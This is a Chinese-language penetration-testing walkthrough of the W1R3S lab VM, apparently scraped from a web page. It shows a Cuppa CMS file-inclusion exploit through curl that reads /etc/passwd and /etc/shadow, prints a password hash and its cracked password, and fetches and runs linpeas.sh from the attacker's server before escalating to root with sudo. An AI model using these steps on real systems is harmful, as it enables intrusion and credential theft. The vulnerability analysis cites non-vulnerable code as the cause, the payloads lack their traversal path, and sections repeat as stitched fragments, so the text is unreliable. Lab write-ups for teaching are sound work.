红队渗透项目：w1r3s-editable 渗透测试教学文档<\/h1>

项目概述<\/h2>
本教学文档详细记录了针对w1r3s-editable靶机的完整渗透测试过程，涵盖信息收集、漏洞利用、权限提升等关键环节，适合网络安全学习者参考。<\/p>

环境准备<\/h2>

攻击机<\/strong>：Kali Linux (VMware虚拟机环境)<\/li>
目标机<\/strong>：IP地址为192.168.111.137<\/li>

工具集<\/strong>：nmap、curl、John the Ripper、linpeas.sh等<\/li> <\/ul>
一、信息收集阶段<\/h2>
1. 网络扫描<\/h3>
使用nmap进行主机发现和端口扫描：<\/p>
nmap -sP 192.168.111.0\/24 # 主机发现<\/span> <\/span><\/span>nmap 192.168.111.137 -p- -sS -sV -A -T5 # 详细扫描<\/span> <\/span><\/span><\/code><\/pre>扫描结果<\/strong>：<\/p> 21\/tcp: FTP (允许匿名登录)<\/li> 22\/tcp: SSH<\/li> 80\/tcp: HTTP<\/li> 3306\/tcp: MySQL<\/li> <\/ul> 2. FTP服务枚举<\/h3> 匿名登录FTP服务：<\/p> ftp 192.168.111.137 <\/span><\/span>用户名: Anonymous <\/span><\/span>密码: Anonymous <\/span><\/span><\/code><\/pre>在content目录下发现三个txt文件：<\/p> 01.txt<\/li> 02.txt (包含Base64编码字符串: SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==<\/code>)<\/li> 03.txt<\/li> <\/ul> Base64解码后无有效信息，FTP途径未能获取关键信息。<\/p> 二、Web渗透阶段<\/h2> 1. 目录枚举<\/h3> 发现Cuppa CMS管理后台路径：<\/p> http:\/\/192.168.111.137\/administrator\/installation\/ <\/code><\/pre> 2. 漏洞利用<\/h3> 漏洞信息<\/strong>：<\/p> Cuppa CMS存在文件包含漏洞(Exploit-DB ID: 25971)<\/li> 漏洞路径：\/administrator\/alerts\/alertConfigField.php<\/code><\/li> 参数：urlConfig<\/code><\/li> <\/ul> 利用方法<\/strong>：由于直接GET请求无响应，需使用POST方式：<\/p> curl --data-urlencode urlConfig=<\/span>etc\/passwd http:\/\/192.168.111.137\/administrator\/alerts\/alertConfigField.php <\/span><\/span><\/code><\/pre>成功读取\/etc\/passwd<\/code>文件，获取用户信息：<\/p> w1r3s:x:1000:1000:W1R3S,,,:\/home\/w1r3s:\/bin\/bash <\/code><\/pre> 3. 密码获取<\/h3> 读取shadow文件：<\/p> curl -s --data-urlencode urlConfig=<\/span>etc\/shadow http:\/\/192.168.111.137\/administrator\/alerts\/alertConfigField.php <\/span><\/span><\/code><\/pre>提取w1r3s用户的密码哈希：<\/p> w1r3s:$6$xe\/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb\/io7x9q1iP.:17567:0:99999:7::: <\/code><\/pre> 使用John the Ripper破解密码：<\/p> 将哈希保存到2.txt<\/li> 运行破解：<\/li> <\/ol> john 2.txt <\/span><\/span><\/code><\/pre>破解结果<\/strong>：密码为computer<\/code><\/p> 三、权限提升阶段<\/h2> 1. SSH登录<\/h3> 使用获取的凭据登录：<\/p> ssh w1r3s@192.168.111.137 <\/span><\/span>密码: computer <\/span><\/span><\/code><\/pre>2. 本地信息收集<\/h3> 使用linpeas.sh进行本地枚举：<\/p> 在攻击机启动HTTP服务：<\/li> <\/ol> python -m SimpleHTTPServer 8081<\/span> <\/span><\/span><\/code><\/pre> 目标机下载并运行：<\/li> <\/ol> wget http:\/\/192.168.111.128:8081\/linpeas.sh <\/span><\/span>chmod +x linpeas.sh <\/span><\/span>.\/linpeas.sh <\/span><\/span><\/code><\/pre>3. Sudo提权<\/h3> 检查sudo权限：<\/p> sudo -l <\/span><\/span><\/code><\/pre>输出<\/strong>：<\/p> User w1r3s may run the following commands on W1R3S: (ALL : ALL) ALL <\/code><\/pre> 表示w1r3s用户拥有所有sudo权限，可直接提权：<\/p> sudo su <\/span><\/span><\/code><\/pre>4. 获取flag<\/h3> 进入root目录查看flag：<\/p> cd \/root\/ <\/span><\/span>ls -la <\/span><\/span><\/code><\/pre>四、漏洞分析<\/h2> 文件包含漏洞根源<\/h3> 漏洞文件：\/administrator\/alerts\/alertConfigField.php<\/code> 问题代码：<\/p> include_once<\/span>(realpath<\/span>(__DIR__<\/span>.<\/span>'\/..\/classes\/Cuppa.php'<\/span>)); <\/span><\/span><\/code><\/pre>漏洞原因<\/strong>：<\/p> 使用include_once()<\/code>函数包含用户可控参数<\/li> realpath()<\/code>和__DIR__<\/code>组合可能允许目录遍历<\/li> 缺乏对urlConfig<\/code>参数的严格过滤<\/li> <\/ol> 修复建议<\/h3> 避免直接包含用户输入<\/li> 使用白名单限制可包含的文件<\/li> 移除不必要的目录遍历功能<\/li> 对输入进行严格过滤和验证<\/li> <\/ol> 总结<\/h2> 本次渗透测试完整流程：<\/p> 通过nmap扫描发现开放服务<\/li> 利用FTP匿名登录收集信息<\/li> 发现Cuppa CMS并利用文件包含漏洞<\/li> 读取系统文件获取用户凭据<\/li> 破解密码后通过SSH登录<\/li> 利用sudo配置不当直接提权<\/li> <\/ol> 关键点<\/strong>：<\/p> 文件包含漏洞的POST请求利用方式<\/li> 从shadow文件提取密码哈希的技巧<\/li> sudo配置审计的重要性<\/li> 自动化工具(linpeas)在权限提升中的应用<\/li> <\/ul> 扩展思考<\/h2> 如果文件包含漏洞无法直接利用，还有哪些可能的攻击路径？<\/li> 如何防御此类文件包含漏洞？<\/li> 在sudo配置中，如何合理分配权限而不造成安全隐患？<\/li> <\/ol>

红队渗透项目：w1r3s-editable 渗透测试教学文档<\/h1>

项目概述<\/h2> 本教学文档详细记录了针对w1r3s-editable靶机的完整渗透测试过程，涵盖信息收集、漏洞利用、权限提升等关键环节，适合网络安全学习者参考。<\/p>

一、信息收集阶段<\/h2>

二、Web渗透阶段<\/h2>

四、漏洞分析<\/h2>

扩展思考<\/h2> 如果文件包含漏洞无法直接利用，还有哪些可能的攻击路径？<\/li> 如何防御此类文件包含漏洞？<\/li> 在sudo配置中，如何合理分配权限而不造成安全隐患？<\/li> <\/ol>

项目概述<\/h2>
本教学文档详细记录了针对w1r3s-editable靶机的完整渗透测试过程，涵盖信息收集、漏洞利用、权限提升等关键环节，适合网络安全学习者参考。<\/p>

扩展思考<\/h2>

如果文件包含漏洞无法直接利用，还有哪些可能的攻击路径？<\/li>
如何防御此类文件包含漏洞？<\/li>
在sudo配置中，如何合理分配权限而不造成安全隐患？<\/li> <\/ol>